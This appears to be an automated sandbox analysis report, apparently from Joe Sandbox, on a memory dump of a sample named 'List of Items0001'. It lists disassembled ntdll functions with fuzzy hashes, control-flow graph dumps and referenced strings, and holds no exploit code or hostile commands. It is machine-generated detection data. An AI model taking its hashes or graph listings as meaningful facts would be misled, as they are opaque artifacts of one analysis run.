                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7abb9e8d7a20082e562fa56588fe2ad5bab8c28b60b1387b88acd56817d6a3ba
                                                • Instruction ID: c87b884ff890f7c008efd68beb2ed8bf20ff36cb0f77caf16041c9a84b7b9c2d
                                                • Opcode Fuzzy Hash: 7abb9e8d7a20082e562fa56588fe2ad5bab8c28b60b1387b88acd56817d6a3ba
                                                • Instruction Fuzzy Hash: B290023120110843DD0065595704B9610054FE0301F51D41BA1124714DC625C8557621
                                                Function 326A38D0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 454e3271020a833999a9fcf04c0fe9cae48e9b731b94e6901c9ece4be63eabe4
                                                • Instruction ID: 7a1b3164f7f345dd88f1dd41074a4fa80acbb2e171ee6957f0547acdfea3958d
                                                • Opcode Fuzzy Hash: 454e3271020a833999a9fcf04c0fe9cae48e9b731b94e6901c9ece4be63eabe4
                                                • Instruction Fuzzy Hash: 7A90022124515103DD50755D570466650056FE0201F51D426A1814654DC56588597321
                                                Function 326A2B20 Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 06a7a5ed4ecab465b3696ca630c3e5f9dc34e2874614cd4e7c95af76821cda65
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 3273A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 302 3273a1f0-3273a269 call 32672330 * 2 RtlDebugPrintTimes 308 3273a41f-3273a444 call 326724d0 * 2 call 326a4b50 302->308 309 3273a26f-3273a27a 302->309 311 3273a2a4 309->311 312 3273a27c-3273a289 309->312 313 3273a2a8-3273a2b4 311->313 315 3273a28b-3273a28d 312->315 316 3273a28f-3273a295 312->316 317 3273a2c1-3273a2c3 313->317 315->316 319 3273a373-3273a375 316->319 320 3273a29b-3273a2a2 316->320 321 3273a2b6-3273a2bc 317->321 322 3273a2c5-3273a2c7 317->322 323 3273a39f-3273a3a1 319->323 320->313 325 3273a2be 321->325 326 3273a2cc-3273a2d0 321->326 322->323 327 3273a3a7-3273a3b4 323->327 328 3273a2d5-3273a2fd RtlDebugPrintTimes 323->328 325->317 331 3273a3ec-3273a3ee 326->331 332 3273a3b6-3273a3c3 327->332 333 3273a3da-3273a3e6 327->333 328->308 340 3273a303-3273a320 RtlDebugPrintTimes 328->340 331->323 336 3273a3c5-3273a3c9 332->336 337 3273a3cb-3273a3d1 332->337 334 3273a3fb-3273a3fd 333->334 338 3273a3f0-3273a3f6 334->338 339 3273a3ff-3273a401 334->339 336->337 341 3273a3d7 337->341 342 3273a4eb-3273a4ed 337->342 344 3273a447-3273a44b 338->344 345 3273a3f8 338->345 343 3273a403-3273a409 339->343 340->308 350 3273a326-3273a34c RtlDebugPrintTimes 340->350 341->333 342->343 347 3273a450-3273a474 RtlDebugPrintTimes 343->347 348 3273a40b-3273a41d RtlDebugPrintTimes 343->348 346 3273a51f-3273a521 344->346 345->334 347->308 353 3273a476-3273a493 RtlDebugPrintTimes 347->353 348->308 350->308 355 3273a352-3273a354 350->355 353->308 362 3273a495-3273a4c4 RtlDebugPrintTimes 353->362 356 3273a377-3273a38a 355->356 357 3273a356-3273a363 355->357 361 3273a397-3273a399 356->361 359 3273a365-3273a369 357->359 360 3273a36b-3273a371 357->360 359->360 360->319 360->356 363 3273a39b-3273a39d 361->363 364 3273a38c-3273a392 361->364 362->308 368 3273a4ca-3273a4cc 362->368 363->323 365 3273a394 364->365 366 3273a3e8-3273a3ea 364->366 365->361 366->331 369 3273a4f2-3273a505 368->369 370 3273a4ce-3273a4db 368->370 371 3273a512-3273a514 369->371 372 3273a4e3-3273a4e9 370->372 373 3273a4dd-3273a4e1 370->373 374 3273a507-3273a50d 371->374 375 3273a516 371->375 372->342 372->369 373->372 376 3273a51b-3273a51d 374->376 377 3273a50f 374->377 375->339 376->346 377->371
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP:
                                                • API String ID: 3446177414-2466845122
                                                • Opcode ID: 91c66a33d21e0ca04550de44d5c5a6dbde47ef576aaf736f941ee2a8d29c715e
                                                • Instruction ID: b0ef32e5741da71a8bb7c2f9c72122f05ef018571d376fa752eca8e1dc69162c
                                                • Opcode Fuzzy Hash: 91c66a33d21e0ca04550de44d5c5a6dbde47ef576aaf736f941ee2a8d29c715e
                                                • Instruction Fuzzy Hash: BEA19C756063128FD706CE28C895A1AB7E6FF88354F14492DEA45EB312EB70EC45CBD1
                                                Function 32697550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 378 32697550-32697571 379 326975ab-326975b9 call 326a4b50 378->379 380 32697573-3269758f call 3266e580 378->380 385 32697595-326975a2 380->385 386 326d4443 380->386 387 326975ba-326975c9 call 32697738 385->387 388 326975a4 385->388 390 326d444a-326d4450 386->390 394 326975cb-326975e1 call 326976ed 387->394 395 32697621-3269762a 387->395 388->379 392 326d4456-326d44c3 call 326eef10 call 326a8f40 RtlDebugPrintTimes BaseQueryModuleData 390->392 393 326975e7-326975f0 call 32697648 390->393 392->393 410 326d44c9-326d44d1 392->410 393->395 403 326975f2 393->403 394->390 394->393 398 326975f8-32697601 395->398 405 3269762c-3269762e 398->405 406 32697603-32697612 call 3269763b 398->406 403->398 407 32697614-32697616 405->407 406->407 412 32697618-3269761a 407->412 413 32697630-32697639 407->413 410->393 415 326d44d7-326d44de 410->415 412->388 414 3269761c 412->414 413->412 416 326d45c9-326d45db call 326a2b70 414->416 415->393 417 326d44e4-326d44ef 415->417 416->388 419 326d44f5-326d452e call 326eef10 call 326aa9c0 417->419 420 326d45c4 call 326a4c68 417->420 427 326d4546-326d4576 call 326eef10 419->427 428 326d4530-326d4541 call 326eef10 419->428 420->416 427->393 433 326d457c-326d458a call 326aa690 427->433 428->395 436 326d458c-326d458e 433->436 437 326d4591-326d45ae call 326eef10 call 326dcc1e 433->437 436->437 437->393 442 326d45b4-326d45bd 437->442 442->433 443 326d45bf 442->443 443->393
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 326D4592
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 326D4530
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 326D4460
                                                • Execute=1, xrefs: 326D451E
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 326D454D
                                                • ExecuteOptions, xrefs: 326D44AB
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 326D4507
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: d2bc7173c5049a8266a37451a69535843ef84389125d5d9e30626f1f75f43133
                                                • Instruction ID: 7b8b05af06bfcf997ef73414438c0a4d8d507780554af732f676a45ebdb33be3
                                                • Opcode Fuzzy Hash: d2bc7173c5049a8266a37451a69535843ef84389125d5d9e30626f1f75f43133
                                                • Instruction Fuzzy Hash: 8E5124F1A0021DBBEB169AA4DC98FED73A8EF08354F5004E9E505A7180EF70AE45CF65
                                                Function 3267A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 545 3267a170-3267a18f 546 3267a195-3267a1b1 545->546 547 3267a4ad-3267a4b4 545->547 548 3267a1b7-3267a1c0 546->548 549 326c77f3-326c77f8 546->549 547->546 550 3267a4ba-326c77c8 547->550 548->549 551 3267a1c6-3267a1cc 548->551 550->546 555 326c77ce-326c77d3 550->555 553 3267a1d2-3267a1d4 551->553 554 3267a5da-3267a5dc 551->554 553->549 556 3267a1da-3267a1dd 553->556 554->556 557 3267a5e2 554->557 558 3267a393-3267a399 555->558 556->549 559 3267a1e3-3267a1e6 556->559 557->559 560 3267a1fa-3267a1fd 559->560 561 3267a1e8-3267a1f1 559->561 564 3267a5e7-3267a5f0 560->564 565 3267a203-3267a24b 560->565 562 3267a1f7 561->562 563 326c77d8-326c77e2 561->563 562->560 567 326c77e7-326c77f0 call 326eef10 563->567 564->565 566 3267a5f6-326c780c 564->566 568 3267a250-3267a255 565->568 566->567 567->549 571 3267a39c-3267a39f 568->571 572 3267a25b-3267a263 568->572 573 3267a3a5-3267a3a8 571->573 574 3267a26f-3267a27d 571->574 572->574 576 3267a265-3267a269 572->576 577 3267a3ae-3267a3be 573->577 578 326c7823-326c7826 573->578 574->577 580 3267a283-3267a288 574->580 576->574 579 3267a4bf-3267a4c8 576->579 577->578 583 3267a3c4-3267a3cd 577->583 581 326c782c-326c7831 578->581 582 3267a28c-3267a28e 578->582 584 3267a4e0-3267a4e3 579->584 585 3267a4ca-3267a4cc 579->585 580->582 586 326c7838 581->586 590 3267a294-3267a2ac call 3267a600 582->590 591 326c7833 582->591 583->582 588 326c780e 584->588 589 3267a4e9-3267a4ec 584->589 585->574 587 3267a4d2-3267a4db 585->587 593 326c783a-326c783c 586->593 587->582 594 326c7819 588->594 589->594 595 3267a4f2-3267a4f5 589->595 598 3267a3d2-3267a3d9 590->598 599 3267a2b2-3267a2da 590->599 591->586 593->558 597 326c7842 593->597 594->578 595->585 600 3267a2dc-3267a2de 598->600 601 3267a3df-3267a3e2 598->601 599->600 600->593 602 3267a2e4-3267a2eb 600->602 601->600 603 3267a3e8-3267a3f3 601->603 604 326c78ed 602->604 605 3267a2f1-3267a2f4 602->605 603->568 607 326c78f1-326c7909 call 326eef10 604->607 606 3267a300-3267a30a 605->606 606->607 608 3267a310-3267a32c call 3267a760 606->608 607->558 613 3267a4f7-3267a500 608->613 614 3267a332-3267a337 608->614 615 3267a502-3267a50b 613->615 616 3267a521-3267a523 613->616 614->558 617 3267a339-3267a35d 614->617 615->616 618 3267a50d-3267a511 615->618 619 3267a525-3267a543 call 32664428 616->619 620 3267a549-3267a551 616->620 621 3267a360-3267a363 617->621 622 3267a517-3267a51b 618->622 623 3267a5a1-3267a5cb RtlDebugPrintTimes 618->623 619->558 619->620 625 3267a369-3267a36c 621->625 626 3267a3f8-3267a3fc 621->626 622->616 622->623 623->616 641 3267a5d1-3267a5d5 623->641 630 3267a372-3267a374 625->630 631 326c78e3 625->631 628 3267a402-3267a405 626->628 629 326c7847-326c784f 626->629 633 3267a554-3267a56a 628->633 635 3267a40b-3267a40e 628->635 629->633 634 326c7855-326c7859 629->634 636 3267a440-3267a459 call 3267a600 630->636 637 3267a37a-3267a381 630->637 631->604 642 3267a414-3267a42c 633->642 643 3267a570-3267a579 633->643 634->633 644 326c785f-326c7868 634->644 635->625 635->642 651 3267a45f-3267a487 636->651 652 3267a57e-3267a585 636->652 639 3267a387-3267a38c 637->639 640 3267a49b-3267a4a2 637->640 639->558 646 3267a38e 639->646 640->606 647 3267a4a8 640->647 641->616 642->625 650 3267a432-3267a43b 642->650 643->630 648 326c786a-326c786d 644->648 649 326c7892-326c7894 644->649 646->558 647->604 654 326c786f-326c7879 648->654 655 326c787b-326c787e 648->655 649->633 653 326c789a-326c78a3 649->653 650->630 656 3267a489-3267a48b 651->656 652->656 657 3267a58b-3267a58e 652->657 653->630 658 326c788e 654->658 659 326c788b 655->659 660 326c7880-326c7889 655->660 656->639 661 3267a491-3267a493 656->661 657->656 662 3267a594-3267a59c 657->662 658->649 659->658 660->653 663 326c78a8-326c78b1 661->663 664 3267a499 661->664 662->621 663->664 665 326c78b7-326c78bd 663->665 664->640 665->664 666 326c78c3-326c78cb 665->666 666->664 667 326c78d1-326c78dc 666->667 667->666 668 326c78de 667->668 668->664
                                                Strings
                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 326C78F3
                                                • Actx , xrefs: 326C7819, 326C7880
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C77E2
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C7807
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326C77DD, 326C7802
                                                • SsHd, xrefs: 3267A304
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-1988757188
                                                • Opcode ID: 3699491a445ada58d543928c58b5aabbe47653e1316c0dfca2f17c3b91955f6b
                                                • Instruction ID: edd4ceae05b1bfe6e329cc804a47e170040ebabc8240085920bbbad3b7c57af1
                                                • Opcode Fuzzy Hash: 3699491a445ada58d543928c58b5aabbe47653e1316c0dfca2f17c3b91955f6b
                                                • Instruction Fuzzy Hash: 42E1BEB46083018FE719CE28DD94B5A77E5FF84368F504A2DE965CB290DB32DC85CB92
                                                Function 3267D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 713 3267d690-3267d6cb 714 3267d907-3267d90e 713->714 715 3267d6d1-3267d6db 713->715 714->715 716 3267d914-326c9139 714->716 717 3267d6e1-3267d6ea 715->717 718 326c9164 715->718 716->715 724 326c913f-326c9144 716->724 717->718 720 3267d6f0-3267d6f3 717->720 721 326c916e-326c917d 718->721 722 3267d8fa-3267d8fc 720->722 723 3267d6f9-3267d6fb 720->723 727 326c9158-326c9161 call 326eef10 721->727 725 3267d902 722->725 726 3267d701-3267d704 722->726 723->718 723->726 728 3267d847-3267d858 call 326a4b50 724->728 729 3267d70a-3267d70d 725->729 726->718 726->729 727->718 733 3267d713-3267d716 729->733 734 3267d919-3267d922 729->734 737 3267d92d-3267d936 733->737 738 3267d71c-3267d768 call 3267d580 733->738 734->733 736 3267d928-326c9153 734->736 736->727 737->738 740 3267d93c 737->740 738->728 743 3267d76e-3267d772 738->743 740->721 743->728 744 3267d778-3267d77f 743->744 745 3267d785-3267d789 744->745 746 3267d8f1-3267d8f5 744->746 748 3267d790-3267d79a 745->748 747 326c9370-326c9388 call 326eef10 746->747 747->728 748->747 749 3267d7a0-3267d7a7 748->749 751 3267d80d-3267d82d 749->751 752 3267d7a9-3267d7ad 749->752 756 3267d830-3267d833 751->756 754 326c917f 752->754 755 3267d7b3-3267d7b8 752->755 758 326c9186-326c9188 754->758 757 3267d7be-3267d7c5 755->757 755->758 759 3267d835-3267d838 756->759 760 3267d85b-3267d860 756->760 764 326c91f7-326c91fa 757->764 765 3267d7cb-3267d803 call 326a8170 757->765 758->757 763 326c918e-326c91b7 758->763 766 3267d83e-3267d840 759->766 767 326c9366-326c936b 759->767 761 3267d866-3267d869 760->761 762 326c92e0-326c92e8 760->762 770 3267d941-3267d94f 761->770 771 3267d86f-3267d872 761->771 762->770 772 326c92ee-326c92f2 762->772 763->751 773 326c91bd-326c91d7 call 326b8050 763->773 775 326c91fe-326c920d call 326b8050 764->775 788 3267d805-3267d807 765->788 768 3267d842 766->768 769 3267d891-3267d8ac call 3267a600 766->769 767->728 768->728 795 3267d8b2-3267d8da 769->795 796 326c9335-326c933a 769->796 776 3267d874-3267d884 770->776 779 3267d955-3267d95e 770->779 771->759 771->776 772->770 777 326c92f8-326c9301 772->777 773->788 794 326c91dd-326c91f0 773->794 790 326c920f-326c921d 775->790 791 326c9224 775->791 776->759 783 3267d886-3267d88f 776->783 784 326c931f-326c9321 777->784 785 326c9303-326c9306 777->785 779->766 783->766 784->770 798 326c9327-326c9330 784->798 792 326c9308-326c930e 785->792 793 326c9310-326c9313 785->793 788->751 797 326c922d-326c9231 788->797 790->775 801 326c921f 790->801 791->797 792->784 803 326c931c 793->803 804 326c9315-326c931a 793->804 794->773 805 326c91f2 794->805 799 3267d8dc-3267d8de 795->799 796->799 800 326c9340-326c9343 796->800 797->751 802 326c9237-326c923d 797->802 798->766 809 3267d8e4-3267d8eb 799->809 810 326c9356-326c935b 799->810 800->799 806 326c9349-326c9351 800->806 801->751 807 326c923f-326c925c 802->807 808 326c9264-326c926d 802->808 803->784 804->798 805->751 806->756 807->808 812 326c925e-326c9261 807->812 813 326c926f-326c9274 808->813 814 326c92b4-326c92b6 808->814 809->746 809->748 810->728 811 326c9361 810->811 811->767 812->808 813->814 817 326c9276-326c927a 813->817 815 326c92b8-326c92d3 call 32664428 814->815 816 326c92d9-326c92db 814->816 815->728 815->816 816->728 819 326c927c-326c9280 817->819 820 326c9282-326c92ae RtlDebugPrintTimes 817->820 819->814 819->820 820->814 823 326c92b0 820->823 823->814
                                                APIs
                                                Strings
                                                • GsHd, xrefs: 3267D794
                                                • Actx , xrefs: 326C9315
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C9153
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C9178
                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 326C9372
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326C914E, 326C9173
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-2196497285
                                                • Opcode ID: 5532c6f812bbd5fd74fcefff3b91785341038d9c2b511f91ec1bb345e5aff1b6
                                                • Instruction ID: 04c59f826083e902c9e26d33bf21871bb34af32138c7679f016eaa07e15be784
                                                • Opcode Fuzzy Hash: 5532c6f812bbd5fd74fcefff3b91785341038d9c2b511f91ec1bb345e5aff1b6
                                                • Instruction Fuzzy Hash: 30E1AFB4605342CFE704CF28D880B5AB7E4FF88758F504A6DE9958B292DB71E844CB92
                                                Function 326DFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                • API String ID: 3446177414-4227709934
                                                • Opcode ID: b8e6db41b4863779de3f43dfde8933d086ed10958b6bb17e0938caeb1de39c4c
                                                • Instruction ID: 731a3a353d5aca204fa22d8fe79e0be0b3c612e2fbd8186537decfbab358b3bb
                                                • Opcode Fuzzy Hash: b8e6db41b4863779de3f43dfde8933d086ed10958b6bb17e0938caeb1de39c4c
                                                • Instruction Fuzzy Hash: EA4159B9A0120DABDB01CF99C990ADEBBB9FF48758F140169ED04A7350DB719A41CB90
                                                Function 3270F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                • API String ID: 3446177414-3492000579
                                                • Opcode ID: e6f19749d1d3de8eee90f947fc00f6882d6255b55a00a81852a15518f36cb6a6
                                                • Instruction ID: 2f57a0a66d0db162e9c95d0a750992cd8949352f844079000730e7a1ffa1db26
                                                • Opcode Fuzzy Hash: e6f19749d1d3de8eee90f947fc00f6882d6255b55a00a81852a15518f36cb6a6
                                                • Instruction Fuzzy Hash: 9971EC719016859FCB02CFA9C4A0AA9FBF2FF89314F24845AE444AF251CF71998ACF55
                                                Function 32656565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326B9843
                                                • LdrpLoadShimEngine, xrefs: 326B984A, 326B988B
                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326B9885
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326B9854, 326B9895
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-3589223738
                                                • Opcode ID: a37b1e89960f6054352575af6a7e373753a6f6aafc6bf50ef001b1ab212ca617
                                                • Instruction ID: 194e59c4f941888c5c37d2c99a2f9779674d6dd3e5a48a85bf7e0d234c701bae
                                                • Opcode Fuzzy Hash: a37b1e89960f6054352575af6a7e373753a6f6aafc6bf50ef001b1ab212ca617
                                                • Instruction Fuzzy Hash: 8F512676A413589FEB04CBA8CC94B9DBBB6BF40314F340955E541BF295CBB09C81CB85
                                                Function 3268DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-3224558752
                                                • Opcode ID: a21d6d95b70508fd20da5e43439113425d46eb78f5b0f36bd7c521de173d60fa
                                                • Instruction ID: 0f9b37aa458d1837cf3352013f8213106a59d4819d01600e1bb42106f29add3a
                                                • Opcode Fuzzy Hash: a21d6d95b70508fd20da5e43439113425d46eb78f5b0f36bd7c521de173d60fa
                                                • Instruction Fuzzy Hash: A5419D76604750EFE306DF34C484B49B3B8FF41324F248969E81597392CF78A980CBA2
                                                Function 3268DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-1222099010
                                                • Opcode ID: f6e26601bb3f67d721e845a72427fcc0d95e3d4122c7a1fbb9652a8cd8bd61f0
                                                • Instruction ID: 78dfbb68709dff056072f4d735e709b730bdc8070509054f2bed0d55c17d9611
                                                • Opcode Fuzzy Hash: f6e26601bb3f67d721e845a72427fcc0d95e3d4122c7a1fbb9652a8cd8bd61f0
                                                • Instruction Fuzzy Hash: 423159B61017D4DFE727DB24C448F4977E8FF05768F140889E901476A2CFB9E980CA62
                                                Function 32669046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
